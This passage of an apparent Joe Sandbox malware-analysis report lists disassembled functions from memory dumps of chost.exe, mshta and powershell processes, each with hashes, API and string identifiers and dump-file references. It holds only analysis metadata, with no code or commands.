                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dc797912a9dd998a2f9e1b3e17851358f1a3a2f9703f0521fb270c7deed9757b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A51A02AB0964281EB649B169870AF963B1EF80FC4F588135DD6DCB7DDDE3CE805A300
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007B6570
                                                                                                                                                                                                                                        • String ID: ..\s\ssl\d1_srtp.c$ssl_ctx_make_profiles
                                                                                                                                                                                                                                        • API String ID: 4069847057-118859582
                                                                                                                                                                                                                                        • Opcode ID: 16f19e46741f843f224062977c097fb522a2c69793b77cb91a51971fa61da7e5
                                                                                                                                                                                                                                        • Instruction ID: a3117d2fc9fb9009d692d6e1cefe318c9bf50fe6008ed81f168f457ccbd1926b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16f19e46741f843f224062977c097fb522a2c69793b77cb91a51971fa61da7e5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9151B021B0C64246FB54AB15AC25BBA729DEF84B84F584035DA2D47FEFDE3CE9528310
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: ?
                                                                                                                                                                                                                                        • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                        • Opcode ID: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
                                                                                                                                                                                                                                        • Instruction ID: df73eabb44a2f06a033e4db1e3124a7c1a8e9c46c6ef0faa36ca5ae796876bb9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8041D622A1868646FB789B379485379A6B0EB90BA4F14827DEE5CC6FD5DE3CD441CB00
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6943790B6
                                                                                                                                                                                                                                          • Part of subcall function 00007FF69437A9B8: HeapFree.KERNEL32(?,?,?,00007FF694382D92,?,?,?,00007FF694382DCF,?,?,00000000,00007FF694383295,?,?,?,00007FF6943831C7), ref: 00007FF69437A9CE
                                                                                                                                                                                                                                          • Part of subcall function 00007FF69437A9B8: GetLastError.KERNEL32(?,?,?,00007FF694382D92,?,?,?,00007FF694382DCF,?,?,00000000,00007FF694383295,?,?,?,00007FF6943831C7), ref: 00007FF69437A9D8
                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF69436CC15), ref: 00007FF6943790D4
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\chost.exe
                                                                                                                                                                                                                                        • API String ID: 3580290477-1415524421
                                                                                                                                                                                                                                        • Opcode ID: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
                                                                                                                                                                                                                                        • Instruction ID: 52cb32b1c6c69f5e76d711e043fd5b4d94f897f6066d3ac0390ffdf6535da869
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2414A32A0CA12C6EB24AF3799C10B86395EF457D0B55817DE98D83B86EE3DE591C340
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                        • String ID: U
                                                                                                                                                                                                                                        • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                        • Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                        • Instruction ID: 35f69ef713e0ad9e874611a05a42db580df1e4f5096829ef7faab30f7096ebb7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B418072B18A85C1DB208F36E4943A9A7A1FB88794F548039EE8DC7B98EF3CD441D740
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new
                                                                                                                                                                                                                                        • API String ID: 0-402823876
                                                                                                                                                                                                                                        • Opcode ID: feb9b1f341a818fe45b99e8c6c162b3a0b89dfbb9c9502528c471bd395979744
                                                                                                                                                                                                                                        • Instruction ID: c9a69eb65bd4123118ede14a12413605645ee072fa0ff2aa49a9d08e1c574d39
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: feb9b1f341a818fe45b99e8c6c162b3a0b89dfbb9c9502528c471bd395979744
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BC31B320B09A8242EB08BB25D865BED7299FF48754F884235DA3D47BDBDE2DE5408700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Time$System$File
                                                                                                                                                                                                                                        • String ID: gfff
                                                                                                                                                                                                                                        • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                        • Opcode ID: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
                                                                                                                                                                                                                                        • Instruction ID: 48711945914999802fc0b6fbfe0b6ff5df2c1325dcaadc184eebed976e1766b6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7D21B972B0468685DB54CF29E82077D77E8E788794F448076DA6DC7BA9DE3CD6408710
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentDirectory
                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                        • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                        • Opcode ID: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
                                                                                                                                                                                                                                        • Instruction ID: 20678e9c3187e8d8ec10a93006553312da1a69d06d30a569badd41888879584a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C219172A1C682C2FB309B26D4C426D63A1FB88B48F95C07DDA8D83695DF7CE945CB41
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                        • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                        • Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                                        • Instruction ID: 69f2f3c12087186f24af45d4eae6b35d6b51f5cb6cd45e42dc518d014c53c1a0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92112E32619B8282EB718F26F440259B7E5FB88B94F588274EB8D47769DF3CD551CB00
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                        • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                        • Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                        • Instruction ID: 881db87630076f0d7b2747036c5ec8d92c0139f5c5b3e50d5e61623f4bd89992
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 82017C3291C20786FB70AB7294A627EB3A0EF44708F81807EE55DC6791EE2CE544CA14
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Time$System$File
                                                                                                                                                                                                                                        • String ID: gfff
                                                                                                                                                                                                                                        • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                        • Opcode ID: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
                                                                                                                                                                                                                                        • Instruction ID: 092c7d92e3d5a626c0a0dc267f683c59a2bbcaecfd6cf063da9406cea225dade
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3401DBE2B14A4542DF50DB35F81155577A4F7CC784B449032E65DC7BA9EE2CD6018701
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000018.00000003.2104257991.00000238EAE40000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000238EAE40000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_24_3_238eae40000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                                        • Instruction ID: c93ace06382503432d13d17698bdbb5b9bf4868381ea0aacc4b2b0e7f7a87fc2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F890020489550755D81451911C4926C50446788950FD544A0681794144D85D07961252
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000019.00000002.2140338257.00007FFD93950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD93950000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_25_2_7ffd93950000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 8209695c07ac017324aa4d9ca3842d0812f064fed481a6552811cb7ed99c1daf
                                                                                                                                                                                                                                        • Instruction ID: c12a3136a1bd94d1435f1d95e4631622cc2081a0ebb078a13e2c84aa8dfd79f4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8209695c07ac017324aa4d9ca3842d0812f064fed481a6552811cb7ed99c1daf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D5D13622B0EBC91FE7A5EBA848756B6BBE5EF56310B0800FED48CC70D3D919A845C351
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000019.00000002.2139674065.00007FFD93880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD93880000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_25_2_7ffd93880000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: ddbf23e2fb2a3025be0008b63c343d12d9e8962fa59c81402d1db2c34c3ac5d9
                                                                                                                                                                                                                                        • Instruction ID: ecb99f85c6d8fb3ac5573450c4c0f7d35dd54c66b837d8a4d6fa0ebaf5aef84a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ddbf23e2fb2a3025be0008b63c343d12d9e8962fa59c81402d1db2c34c3ac5d9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7581793060CB884FD759EF6CC855AB57BE4EF96320F1401BED09AC71A3DA35A846CB51
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000019.00000002.2139674065.00007FFD93880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD93880000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_25_2_7ffd93880000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: b4b717eb846268a12fc69a537076ee9efa9e3a14f61805a119089a68309bd93a
                                                                                                                                                                                                                                        • Instruction ID: e004a2c5b0417684d1b273d5dea97f242ac7729a828fbb781c1ef2ddc33c363c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b4b717eb846268a12fc69a537076ee9efa9e3a14f61805a119089a68309bd93a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5719367B0D6928FD312B7ACBC755E97F60DF5232A70801B7D298CB0D3E968544A83E1
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000019.00000002.2138948862.00007FFD9376D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9376D000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_25_2_7ffd9376d000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 39f9800088c27e8e4263c563e3a502080237f222e392df2c26efb882b6201f52
                                                                                                                                                                                                                                        • Instruction ID: 435d93b12445201b28f645b4d4f55f3a0ccf6232b794279a054d4b7cce068338
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39f9800088c27e8e4263c563e3a502080237f222e392df2c26efb882b6201f52
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D41247040DBC45FE7668B289C619523FF4EF53224B1902DFD088DB5A7D629A84AC7A3
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000019.00000002.2139674065.00007FFD93880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD93880000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_25_2_7ffd93880000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa1e79198b88e5f313fc40d7417d608126be89848fdf7addf48c1f6393db9d10
                                                                                                                                                                                                                                        • Instruction ID: be3c6564c77a4289629712e80c2906225ec524df133fe4767f3ab9797a20d06e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa1e79198b88e5f313fc40d7417d608126be89848fdf7addf48c1f6393db9d10
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D31B43091CB4C9FDB199B5C9C066A97BF0FB99311F00426FE449D3292CA70B855CBD2
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000019.00000002.2139674065.00007FFD93880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD93880000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_25_2_7ffd93880000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                        • Instruction ID: d37d26a24dba256ab6f213e214cef65fd22488e8b4254f1bd1e5f5204f62bb1e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
